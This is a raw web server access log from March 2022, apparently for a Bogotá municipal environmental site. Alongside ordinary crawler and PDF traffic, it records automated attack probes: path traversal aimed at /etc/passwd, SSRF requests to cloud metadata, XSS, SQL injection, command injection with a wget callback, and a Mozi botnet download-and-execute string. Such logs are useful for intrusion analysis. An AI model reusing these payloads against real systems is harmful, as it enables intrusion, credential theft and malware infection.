207.46.13.7 - - [15/Mar/2022:02:35:04 -0500] "GET /bla/resoluciones/notificaciones/autos%202019/726.pdf HTTP/1.1" 200 391139
181.215.176.138 - - [15/Mar/2022:02:34:56 -0500] "GET http://aws.interact.sh/computeMetadata/v1/project/ HTTP/1.1" 400 226
207.46.13.159 - - [15/Mar/2022:02:35:56 -0500] "GET /bla/resoluciones/autos%202019/0135.pdf HTTP/1.1" 200 259310
216.245.221.92 - - [15/Mar/2022:02:36:27 -0500] "HEAD / HTTP/1.1" 200 -
181.215.176.138 - - [15/Mar/2022:02:36:10 -0500] "GET http://aws.interact.sh/opc/v1/instance HTTP/1.1" 400 226
40.77.190.25 - - [15/Mar/2022:02:38:37 -0500] "GET /BLA/boletinlegal/ajax.js HTTP/1.1" 200 577
40.77.190.152 - - [15/Mar/2022:02:38:37 -0500] "GET /BLA/boletinlegal/niceforms.js HTTP/1.1" 200 22876
157.55.39.218 - - [15/Mar/2022:02:39:18 -0500] "GET /bla/resoluciones/autos%202014/1954.pdf HTTP/1.1" 200 614487
216.245.221.92 - - [15/Mar/2022:02:41:27 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [15/Mar/2022:02:40:44 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45639
181.215.176.138 - - [15/Mar/2022:02:41:52 -0500] "GET /cs/Satellite?destpage=\"<h1xxx\"><script>alert(document.domain)</script>&pagename=OpenMarket%2FXcelerate%2FUIFramework%2FLoginError HTTP/1.1" 404 1011
201.245.192.253 - - [15/Mar/2022:02:41:31 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 46109
66.249.73.97 - - [15/Mar/2022:02:42:26 -0500] "-" 408 -
181.215.176.138 - - [15/Mar/2022:02:41:50 -0500] "GET http://100.100.100.200/dynamic/instance-identity/document HTTP/1.1" 400 226
201.245.192.253 - - [15/Mar/2022:02:41:49 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 117066
49.7.21.90 - - [15/Mar/2022:02:46:18 -0500] "GET / HTTP/1.1" 200 319
216.245.221.92 - - [15/Mar/2022:02:46:27 -0500] "HEAD / HTTP/1.1" 200 -
207.46.13.7 - - [15/Mar/2022:02:47:37 -0500] "GET /bla/resoluciones/autos%202014/4284.pdf HTTP/1.1" 200 553362
66.249.73.127 - - [15/Mar/2022:02:48:11 -0500] "-" 408 -
173.252.107.117 - - [15/Mar/2022:02:49:16 -0500] "GET /mas-de-30-tinguas-fueron-liberadas-en-la-semana-de-los-humedales.html HTTP/1.1" 206 950
173.252.107.11 - - [15/Mar/2022:02:49:16 -0500] "GET /mas-de-30-tinguas-fueron-liberadas-en-la-semana-de-los-humedales.html HTTP/1.1" 206 950
216.245.221.92 - - [15/Mar/2022:02:51:27 -0500] "HEAD / HTTP/1.1" 200 -
181.215.176.138 - - [15/Mar/2022:02:52:06 -0500] "GET /backupmgt/pre_connect_check.php?auth_name=fail;wget http://c8o1scubpsncigj6avd0cearnmeynmoma.oast.site; HTTP/1.1" 400 226
201.245.192.253 - - [15/Mar/2022:02:51:57 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 117066
66.249.73.127 - - [15/Mar/2022:02:56:12 -0500] "-" 408 -
216.245.221.92 - - [15/Mar/2022:02:56:27 -0500] "HEAD / HTTP/1.1" 200 -
157.55.39.218 - - [15/Mar/2022:02:58:40 -0500] "GET /bla/resoluciones/autos%202014/3336.pdf HTTP/1.1" 200 425780
207.46.13.159 - - [15/Mar/2022:02:59:19 -0500] "GET /bla/resoluciones/autos%202019/0879.pdf HTTP/1.1" 200 268038
216.245.221.92 - - [15/Mar/2022:03:01:27 -0500] "HEAD / HTTP/1.1" 200 -
66.249.73.127 - - [15/Mar/2022:03:02:50 -0500] "-" 408 -
114.119.138.127 - - [15/Mar/2022:03:03:19 -0500] "-" 408 -
201.245.192.253 - - [15/Mar/2022:03:02:49 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 213
114.119.149.109 - - [15/Mar/2022:03:03:50 -0500] "-" 408 -
114.119.128.126 - - [15/Mar/2022:03:04:21 -0500] "-" 408 -
181.215.176.138 - - [15/Mar/2022:03:05:09 -0500] "-" 408 -
207.46.13.43 - - [15/Mar/2022:03:06:13 -0500] "GET /bla/resoluciones/autos%202019/2893.pdf HTTP/1.1" 200 258398
216.245.221.92 - - [15/Mar/2022:03:06:27 -0500] "HEAD / HTTP/1.1" 200 -
66.249.73.97 - - [15/Mar/2022:03:10:24 -0500] "-" 408 -
216.245.221.92 - - [15/Mar/2022:03:11:27 -0500] "HEAD / HTTP/1.1" 200 -
182.124.76.234 - - [15/Mar/2022:03:12:02 -0500] "27;wget%20http://%s:%d/Mozi.m%20-O%20->%20/tmp/Mozi.m;chmod%20777%20/tmp/Mozi.m;/tmp/Mozi.m%20dlink.mips%27$ HTTP/1.0" 400 946
201.245.192.253 - - [15/Mar/2022:03:12:36 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 117086
40.77.167.26 - - [15/Mar/2022:03:14:02 -0500] "GET /bla/resoluciones/autos%202019/3061.pdf HTTP/1.1" 200 261644
216.245.221.92 - - [15/Mar/2022:03:16:27 -0500] "HEAD / HTTP/1.1" 200 -
66.249.73.127 - - [15/Mar/2022:03:17:20 -0500] "-" 408 -
54.39.177.173 - - [15/Mar/2022:03:17:27 -0500] "GET /ciudad-bolivar-y-puente-aranda-se-alistan-para-una-nueva-llantaton.html HTTP/1.1" 200 991
216.245.221.92 - - [15/Mar/2022:03:21:27 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [15/Mar/2022:03:20:44 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45811
201.245.192.253 - - [15/Mar/2022:03:21:29 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 46129
207.46.13.7 - - [15/Mar/2022:03:22:21 -0500] "GET /bla/resoluciones/autos%202014/3112.pdf HTTP/1.1" 200 210405
201.245.192.253 - - [15/Mar/2022:03:21:33 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 117086
66.249.73.127 - - [15/Mar/2022:03:24:04 -0500] "-" 408 -
216.245.221.92 - - [15/Mar/2022:03:26:27 -0500] "HEAD / HTTP/1.1" 200 -
207.46.13.209 - - [15/Mar/2022:03:27:31 -0500] "GET /bla/resoluciones/autos%202014/1313.pdf HTTP/1.1" 200 612295
173.252.107.22 - - [15/Mar/2022:03:27:58 -0500] "GET /images/carro-carga-movilidad-4-febrero.jpg HTTP/1.1" 200 46258
157.55.39.218 - - [15/Mar/2022:03:28:33 -0500] "GET /bla/resoluciones/autos%202014/2792.pdf HTTP/1.1" 200 487670
66.249.73.127 - - [15/Mar/2022:03:29:57 -0500] "-" 408 -
216.245.221.92 - - [15/Mar/2022:03:31:27 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [15/Mar/2022:03:30:45 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45811
201.245.192.253 - - [15/Mar/2022:03:31:30 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 46129
201.245.192.253 - - [15/Mar/2022:03:31:39 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 117086
192.241.223.14 - - [15/Mar/2022:03:34:24 -0500] "GET /hudson HTTP/1.1" 404 1018
216.245.221.92 - - [15/Mar/2022:03:36:27 -0500] "HEAD / HTTP/1.1" 200 -
69.63.189.116 - - [15/Mar/2022:03:39:05 -0500] "GET /images/cronica-ambiental-28.jpg HTTP/1.1" 200 50693
173.252.107.22 - - [15/Mar/2022:03:39:05 -0500] "GET /images/jardines-verticales-4-marzo.jpg HTTP/1.1" 200 54804
173.252.107.18 - - [15/Mar/2022:03:39:05 -0500] "GET /images/negocios-verdes-3-marzo.jpg HTTP/1.1" 200 33179
207.46.13.7 - - [15/Mar/2022:03:39:10 -0500] "GET /bla/resoluciones/autos%202014/0208.pdf HTTP/1.1" 200 720672
173.252.107.8 - - [15/Mar/2022:03:39:13 -0500] "GET /images/residuos-bolsas-rojas.jpeg HTTP/1.1" 200 46289
66.249.73.127 - - [15/Mar/2022:03:39:18 -0500] "-" 408 -
173.252.107.116 - - [15/Mar/2022:03:39:19 -0500] "GET /images/pieza-reciclaton-findesemana-febrero-15.jpg HTTP/1.1" 200 35558
181.215.176.138 - - [15/Mar/2022:03:39:22 -0500] "GET /html/setup.html HTTP/1.1" 404 1049
181.215.176.138 - - [15/Mar/2022:03:39:25 -0500] "GET /XMII/Catalog?Mode=GetFileList&Path=Classes/../../../../../../../../../../../../etc/passwd HTTP/1.1" 404 1049
181.215.176.138 - - [15/Mar/2022:03:39:25 -0500] "GET / HTTP/1.1" 200 319
181.215.176.138 - - [15/Mar/2022:03:39:29 -0500] "GET /webadmin/clientlogin/?srid=&action=showdeny&url= HTTP/1.1" 404 1049
181.215.176.138 - - [15/Mar/2022:03:39:33 -0500] "GET /lib///....//....//....//....//....//....//....//....//etc//passwd HTTP/1.1" 403 1037
181.215.176.138 - - [15/Mar/2022:03:39:39 -0500] "PUT /_users/org.couchdb.user:poc HTTP/1.1" 406 -
181.215.176.138 - - [15/Mar/2022:03:39:44 -0500] "GET /wp-content/plugins/simple-fields/simple_fields.php?wp_abspath=/etc/passwd%00 HTTP/1.1" 404 1049
157.55.39.218 - - [15/Mar/2022:03:40:03 -0500] "GET /bla/resoluciones/autos%202014/0896.pdf HTTP/1.1" 200 648270
216.245.221.92 - - [15/Mar/2022:03:41:27 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [15/Mar/2022:03:40:44 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45811
201.245.192.253 - - [15/Mar/2022:03:41:29 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 46129
201.245.192.253 - - [15/Mar/2022:03:41:54 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 117086
181.215.176.138 - - [15/Mar/2022:03:44:41 -0500] "GET /index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 1049
66.249.73.127 - - [15/Mar/2022:03:45:26 -0500] "-" 408 -
216.245.221.92 - - [15/Mar/2022:03:46:27 -0500] "HEAD / HTTP/1.1" 200 -
34.91.128.199 - - [15/Mar/2022:03:46:48 -0500] "GET / HTTP/1.1" 200 319
207.46.13.209 - - [15/Mar/2022:03:47:03 -0500] "GET /bla/resoluciones/autos%202019/0872.pdf HTTP/1.1" 200 268553
216.245.221.92 - - [15/Mar/2022:03:51:27 -0500] "HEAD / HTTP/1.1" 200 -
66.249.73.127 - - [15/Mar/2022:03:51:51 -0500] "-" 408 -
201.245.192.253 - - [15/Mar/2022:03:51:40 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 117086
157.55.39.218 - - [15/Mar/2022:03:52:55 -0500] "GET /bla/resoluciones/autos%202014/1012.pdf HTTP/1.1" 200 616856
181.215.176.138 - - [15/Mar/2022:03:53:07 -0500] "GET /wp-content/plugins/hb-audio-gallery-lite/gallery/audio-download.php?file_path=../../../../wp-config.php&file_size=10 HTTP/1.1" 404 1049
181.215.176.138 - - [15/Mar/2022:03:53:13 -0500] "GET /wp-content/plugins/candidate-application-form/downloadpdffile.php?fileName=../../../../../../../../../../etc/passwd HTTP/1.1" 404 1049
181.215.176.138 - - [15/Mar/2022:03:53:18 -0500] "GET /jnoj/web/polygon/problem/viewfile?id=1&name=../../../../../../../etc/passwd HTTP/1.1" 404 1049
181.215.176.138 - - [15/Mar/2022:03:53:24 -0500] "GET / HTTP/1.1" 200 319
181.215.176.138 - - [15/Mar/2022:03:53:28 -0500] "GET /(download)/etc/passwd HTTP/1.1" 404 1049
181.215.176.138 - - [15/Mar/2022:03:53:29 -0500] "GET /wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=../../../../../../../../../../etc/passwd HTTP/1.1" 404 1049
181.215.176.138 - - [15/Mar/2022:03:53:31 -0500] "GET /index.php?option=com_awdwall&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 1049
181.215.176.138 - - [15/Mar/2022:03:53:38 -0500] "GET /WEBACCOUNT.CGI?OkBtn=++Ok++&RESULTPAGE=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2FWindows%2Fsystem.ini&USEREDIRECT=1&WEBACCOUNTID=&WEBACCOUNTPASSWORD= HTTP/1.1" 404 1049
181.215.176.138 - - [15/Mar/2022:03:53:40 -0500] "GET /index.php?option=com_tweetla&controller=../../../../../../../etc/passwd%00 HTTP/1.1" 404 1049
181.215.176.138 - - [15/Mar/2022:03:53:47 -0500] "GET /apt/v1/context HTTP/1.1" 404 1049
181.215.176.138 - - [15/Mar/2022:03:53:47 -0500] "GET /var/resource_config.json HTTP/1.1" 404 1049
181.215.176.138 - - [15/Mar/2022:03:53:54 -0500] "POST /service/rapture/session HTTP/1.1" 404 1049
181.215.176.138 - - [15/Mar/2022:03:53:57 -0500] "GET /index.php?page=/etc/passwd%00 HTTP/1.1" 404 1049
181.215.176.138 - - [15/Mar/2022:03:53:57 -0500] "GET /__clockwork/app HTTP/1.1" 404 1049
40.77.167.26 - - [15/Mar/2022:03:55:56 -0500] "GET /bla/resoluciones/autos%202014/1589.pdf HTTP/1.1" 200 828207
216.245.221.92 - - [15/Mar/2022:03:56:27 -0500] "HEAD / HTTP/1.1" 200 -
66.249.73.127 - - [15/Mar/2022:03:58:24 -0500] "-" 408 -
207.46.13.7 - - [15/Mar/2022:03:59:28 -0500] "GET /bla/resoluciones/autos%202014/1563.pdf HTTP/1.1" 200 698131
157.55.39.218 - - [15/Mar/2022:04:00:36 -0500] "GET /bla/resoluciones/autos%202019/0173.pdf HTTP/1.1" 200 256456
216.245.221.92 - - [15/Mar/2022:04:01:27 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [15/Mar/2022:04:02:18 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 117086
207.46.13.43 - - [15/Mar/2022:04:04:08 -0500] "GET /bla/resoluciones/autos%202014/3899.pdf HTTP/1.1" 200 230596
66.249.73.127 - - [15/Mar/2022:04:05:23 -0500] "-" 408 -
216.245.221.92 - - [15/Mar/2022:04:06:27 -0500] "HEAD / HTTP/1.1" 200 -
181.215.176.138 - - [15/Mar/2022:04:06:39 -0500] "GET //css//..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows\\win.ini HTTP/1.1" 404 1049
207.46.13.159 - - [15/Mar/2022:04:09:06 -0500] "GET /bla/resoluciones/autos%202014/0801.pdf HTTP/1.1" 200 365113
181.215.176.138 - - [15/Mar/2022:04:09:34 -0500] "POST /index.php HTTP/1.1" 404 1049
181.215.176.138 - - [15/Mar/2022:04:09:34 -0500] "POST /fileDownload?action=downloadBackupFile HTTP/1.1" 404 1049
181.215.176.138 - - [15/Mar/2022:04:10:12 -0500] "POST /cgi-bin/mt/mt-xmlrpc.cgi HTTP/1.1" 404 1049
207.46.13.7 - - [15/Mar/2022:04:10:30 -0500] "GET /bla/resoluciones/autos%202014/4439.pdf HTTP/1.1" 200 570119
216.245.221.92 - - [15/Mar/2022:04:11:27 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [15/Mar/2022:04:11:45 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 116660
66.249.73.127 - - [15/Mar/2022:04:13:02 -0500] "-" 408 -
181.215.176.138 - - [15/Mar/2022:04:15:55 -0500] "GET /card_scan.php?No=30&ReaderNo=%60cat%20/etc/passwd%20%3E%20nuclei.txt%60 HTTP/1.1" 404 1049
216.245.221.92 - - [15/Mar/2022:04:16:27 -0500] "HEAD / HTTP/1.1" 200 -
181.215.176.138 - - [15/Mar/2022:04:16:59 -0500] "GET / HTTP/1.1" 200 319
66.249.73.127 - - [15/Mar/2022:04:18:52 -0500] "-" 408 -
207.46.13.63 - - [15/Mar/2022:04:20:19 -0500] "GET / HTTP/1.1" 200 4720
120.77.62.147 - - [15/Mar/2022:04:20:58 -0500] "GET / HTTP/1.1" 200 319
216.245.221.92 - - [15/Mar/2022:04:21:27 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [15/Mar/2022:04:20:44 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45803
201.245.192.253 - - [15/Mar/2022:04:21:28 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 116660
201.245.192.253 - - [15/Mar/2022:04:21:30 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45946
207.46.13.178 - - [15/Mar/2022:04:22:35 -0500] "GET /acercar-programa-del-distrito-para-ayudar-a-las-empresas-a-crecer-de-manera-sostenible.html HTTP/1.1" 304 -
66.249.73.127 - - [15/Mar/2022:04:25:31 -0500] "-" 408 -
216.245.221.92 - - [15/Mar/2022:04:26:27 -0500] "HEAD / HTTP/1.1" 200 -
181.215.176.138 - - [15/Mar/2022:04:27:34 -0500] "GET /x HTTP/1.1" 404 1049
65.154.226.170 - - [15/Mar/2022:04:28:16 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
65.154.226.170 - - [15/Mar/2022:04:28:16 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
65.154.226.170 - - [15/Mar/2022:04:28:16 -0500] "GET /galeria/galeria/jquery.fancybox.js?v=2.1.5 HTTP/1.1" 200 48706
181.215.176.138 - - [15/Mar/2022:04:29:19 -0500] "POST /fileDownload?action=downloadBackupFile HTTP/1.1" 404 1049
221.2.155.199 - - [15/Mar/2022:04:30:13 -0500] "GET / HTTP/1.0" 200 319
201.245.192.253 - - [15/Mar/2022:04:30:43 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45803
201.245.192.253 - - [15/Mar/2022:04:31:34 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45946
201.245.192.253 - - [15/Mar/2022:04:31:32 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 116660
216.245.221.92 - - [15/Mar/2022:04:38:38 -0500] "HEAD / HTTP/1.1" 200 -
207.46.13.43 - - [15/Mar/2022:04:41:21 -0500] "GET /bla/resoluciones/autos%202014/3668.pdf HTTP/1.1" 200 218577
201.245.192.253 - - [15/Mar/2022:04:40:44 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45803
216.245.221.92 - - [15/Mar/2022:04:42:01 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [15/Mar/2022:04:41:28 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 116660
201.245.192.253 - - [15/Mar/2022:04:41:29 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45946
207.46.13.159 - - [15/Mar/2022:04:42:37 -0500] "GET /bla/resoluciones/autos%202019/1617.pdf HTTP/1.1" 200 365905
181.215.176.138 - - [15/Mar/2022:04:45:10 -0500] "GET /QH.aspx?responderId=ResourceNewResponder&action=download&fileName=.%2fQH.aspx HTTP/1.1" 404 1049
181.215.176.138 - - [15/Mar/2022:04:45:45 -0500] "GET /webadmin/clientlogin/?srid=&action=showdeny&url= HTTP/1.1" 404 1022
181.215.176.138 - - [15/Mar/2022:04:46:07 -0500] "GET / HTTP/1.1" 200 319
181.215.176.138 - - [15/Mar/2022:04:46:20 -0500] "POST /password_change.cgi HTTP/1.1" 404 1160
181.215.176.138 - - [15/Mar/2022:04:46:21 -0500] "GET /crowd/plugins/servlet/exp?cmd=cat%20/etc/shadow HTTP/1.1" 404 1022
181.215.176.138 - - [15/Mar/2022:04:46:25 -0500] "GET /plugins/editors/jckeditor/plugins/jtreelink/dialogs/links.php?extension=menu&view=menu&parent=\"%20UNION%20SELECT%20NULL,NULL,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION(),0x6e75636c65692d74656d706c617465),NULL,NULL,NULL,NULL,NULL--%20aa HTTP/1.1" 404 1160
181.215.176.138 - - [15/Mar/2022:04:46:41 -0500] "GET /wp-content/plugins/simple-fields/simple_fields.php?wp_abspath=/etc/passwd%00 HTTP/1.1" 404 1022
216.245.221.92 - - [15/Mar/2022:04:47:01 -0500] "HEAD / HTTP/1.1" 200 -
181.215.176.138 - - [15/Mar/2022:04:47:06 -0500] "POST /ajax/render/widget_tabbedcontainer_tab_panel HTTP/1.1" 404 1049
181.215.176.138 - - [15/Mar/2022:04:50:28 -0500] "GET /index.php?option=com_jprojectmanager&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 1049
191.109.181.172 - - [15/Mar/2022:04:51:00 -0500] "GET /BLA/resoluciones/AUTOS%202018/4942.pdf HTTP/1.1" 200 229464
191.109.181.172 - - [15/Mar/2022:04:51:01 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
181.215.176.138 - - [15/Mar/2022:04:51:29 -0500] "POST /wp-admin/admin-ajax.php?action=moove_read_xml HTTP/1.1" 404 1049
216.245.221.92 - - [15/Mar/2022:04:52:01 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [15/Mar/2022:04:51:41 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 116660
191.109.181.172 - - [15/Mar/2022:04:55:09 -0500] "GET /BLA/resoluciones/ HTTP/1.1" 200 13093
191.109.181.172 - - [15/Mar/2022:04:55:09 -0500] "GET /BLA/resoluciones/dlf/styles.css HTTP/1.1" 200 3049
191.109.181.172 - - [15/Mar/2022:04:55:09 -0500] "GET /BLA/resoluciones/dlf/folder.png HTTP/1.1" 200 410
191.109.181.172 - - [15/Mar/2022:04:55:09 -0500] "GET /BLA/resoluciones/dlf/bg.gif HTTP/1.1" 200 54
191.109.181.172 - - [15/Mar/2022:04:55:14 -0500] "GET /BLA/resoluciones/dlf/dirup.png HTTP/1.1" 200 644
191.109.181.172 - - [15/Mar/2022:04:55:14 -0500] "GET /BLA/resoluciones/dlf/pdf.gif HTTP/1.1" 200 272
191.109.181.172 - - [15/Mar/2022:04:55:14 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2019%2F HTTP/1.1" 200 339066
192.241.215.243 - - [15/Mar/2022:04:55:54 -0500] "GET / HTTP/1.1" 200 319
207.46.13.43 - - [15/Mar/2022:04:56:42 -0500] "GET /bla/resoluciones/autos%202014/0466.pdf HTTP/1.1" 200 308982
216.245.221.92 - - [15/Mar/2022:04:57:01 -0500] "HEAD / HTTP/1.1" 200 -
54.39.177.173 - - [15/Mar/2022:04:57:12 -0500] "-" 408 -
207.46.13.209 - - [15/Mar/2022:04:57:19 -0500] "GET /bla/resoluciones/autos%202021/4170.pdf HTTP/1.1" 200 350522
40.77.167.26 - - [15/Mar/2022:04:59:42 -0500] "GET /bla/resoluciones/autos%202019/2786.pdf HTTP/1.1" 200 292105
181.215.176.138 - - [15/Mar/2022:05:00:04 -0500] "GET /wp-content/plugins/hb-audio-gallery-lite/gallery/audio-download.php?file_path=../../../../wp-config.php&file_size=10 HTTP/1.1" 404 1022
181.215.176.138 - - [15/Mar/2022:05:00:29 -0500] "POST /XMLCHART HTTP/1.1" 404 1022
181.215.176.138 - - [15/Mar/2022:05:00:48 -0500] "GET /wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=../../../../../../../../../../etc/passwd HTTP/1.1" 404 1022
216.245.221.92 - - [15/Mar/2022:05:02:01 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [15/Mar/2022:05:01:45 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 116660
181.215.176.138 - - [15/Mar/2022:05:04:29 -0500] "GET / HTTP/1.1" 200 319
207.46.13.43 - - [15/Mar/2022:05:05:33 -0500] "GET /BLA/resoluciones/Notificaciones/AUTOS%202017/03972.pdf HTTP/1.1" 200 301054
207.46.13.159 - - [15/Mar/2022:05:06:10 -0500] "GET /bla/resoluciones/autos%202014/2296.pdf HTTP/1.1" 200 724819
181.215.176.138 - - [15/Mar/2022:05:06:29 -0500] "GET /index.php?option=com_jphone&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 1049
190.27.62.214 - - [15/Mar/2022:05:06:32 -0500] "GET /BLA/resoluciones/ HTTP/1.1" 200 13093
190.27.62.214 - - [15/Mar/2022:05:06:32 -0500] "GET /BLA/resoluciones/dlf/styles.css HTTP/1.1" 200 3049
181.215.176.138 - - [15/Mar/2022:05:06:34 -0500] "GET /index.php?option=com_sebercart&view=../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 1022
190.27.62.214 - - [15/Mar/2022:05:06:41 -0500] "GET /BLA/resoluciones/dlf/dirup.png HTTP/1.1" 200 644
190.27.62.214 - - [15/Mar/2022:05:06:41 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2019%2F HTTP/1.1" 200 339066
190.27.62.214 - - [15/Mar/2022:05:06:52 -0500] "GET /BLA/resoluciones/AUTOS%202019/4224.pdf HTTP/1.1" 200 329965
216.245.221.92 - - [15/Mar/2022:05:07:01 -0500] "HEAD / HTTP/1.1" 200 -
181.215.176.138 - - [15/Mar/2022:05:07:05 -0500] "GET /WEBACCOUNT.CGI?OkBtn=++Ok++&RESULTPAGE=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2FWindows%2Fsystem.ini&USEREDIRECT=1&WEBACCOUNTID=&WEBACCOUNTPASSWORD= HTTP/1.1" 404 1022
181.215.176.138 - - [15/Mar/2022:05:07:39 -0500] "GET /index.php?page=/etc/passwd%00 HTTP/1.1" 404 1022
181.215.176.138 - - [15/Mar/2022:05:08:16 -0500] "GET /index.php?option=com_alphauserpoints&view=../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 1049
181.215.176.138 - - [15/Mar/2022:05:08:20 -0500] "GET /wp-content/plugins/ad-widget/views/modal/?step=../../../../../../../etc/passwd%00 HTTP/1.1" 404 1022
66.249.73.100 - - [15/Mar/2022:05:09:25 -0500] "-" 408 -
181.215.176.138 - - [15/Mar/2022:05:09:39 -0500] "GET /index.php?option=com_redshop&view=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 1049
181.215.176.138 - - [15/Mar/2022:05:09:48 -0500] "POST /index.php?s=captcha HTTP/1.1" 404 1049
181.215.176.138 - - [15/Mar/2022:05:10:31 -0500] "GET /ccmivr/IVRGetAudioFile.do?file=../../../../../../../../../../../../../../../etc/passwd HTTP/1.1" 404 1022
181.215.176.138 - - [15/Mar/2022:05:10:36 -0500] "GET /index.php?option=com_tweetla&controller=../../../../../../../etc/passwd%00 HTTP/1.1" 404 1022
41.203.140.114 - - [15/Mar/2022:05:10:44 -0500] "-" 408 -
41.203.140.114 - - [15/Mar/2022:05:10:45 -0500] "-" 408 -
41.203.140.114 - - [15/Mar/2022:05:10:45 -0500] "-" 408 -
181.215.176.138 - - [15/Mar/2022:05:11:10 -0500] "GET /var/resource_config.json HTTP/1.1" 404 1022
190.27.62.214 - - [15/Mar/2022:05:11:49 -0500] "GET /BLA/resoluciones/ HTTP/1.1" 200 13093
216.245.221.92 - - [15/Mar/2022:05:12:01 -0500] "HEAD / HTTP/1.1" 200 -
190.27.62.214 - - [15/Mar/2022:05:12:01 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2020%2F HTTP/1.1" 200 319155
201.245.192.253 - - [15/Mar/2022:05:11:28 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 117060
181.215.176.138 - - [15/Mar/2022:05:13:10 -0500] "GET /index.php?option=com_arcadegames&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 1049
181.215.176.138 - - [15/Mar/2022:05:14:22 -0500] "POST /php/login.php HTTP/1.1" 404 1022
216.245.221.92 - - [15/Mar/2022:05:17:01 -0500] "HEAD / HTTP/1.1" 200 -
207.46.13.209 - - [15/Mar/2022:05:18:02 -0500] "GET /bla/resoluciones/autos%202014/0496.pdf HTTP/1.1" 200 557445
40.77.167.26 - - [15/Mar/2022:05:18:44 -0500] "GET /bla/resoluciones/autos%202014/3691.pdf HTTP/1.1" 200 303778
181.215.176.138 - - [15/Mar/2022:05:18:47 -0500] "GET /index.php?option=com_market&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 1022
181.215.176.138 - - [15/Mar/2022:05:19:29 -0500] "GET /download/index.php?file=../../../../../../../../../etc/passwd HTTP/1.1" 404 324
207.46.13.7 - - [15/Mar/2022:05:19:33 -0500] "GET /bla/resoluciones/autos%202014/1883.pdf HTTP/1.1" 200 497740
42.236.17.196 - - [15/Mar/2022:05:20:18 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
42.236.17.196 - - [15/Mar/2022:05:20:18 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
42.236.17.196 - - [15/Mar/2022:05:20:18 -0500] "GET /galeria/galeria/jquery.fancybox.js?v=2.1.5 HTTP/1.1" 200 48706
42.236.17.196 - - [15/Mar/2022:05:20:24 -0500] "GET /galeria/carrusel/Carrusel/jquery.thumbnailScroller.css HTTP/1.1" 200 2066
42.236.17.196 - - [15/Mar/2022:05:20:28 -0500] "GET /galeria/carrusel/Carrusel/jquery-ui-1.8.13.custom.min.js HTTP/1.1" 200 10800
42.236.17.196 - - [15/Mar/2022:05:20:30 -0500] "GET /galeria/carrusel/Carrusel/jquery.thumbnailScroller.js HTTP/1.1" 200 8157
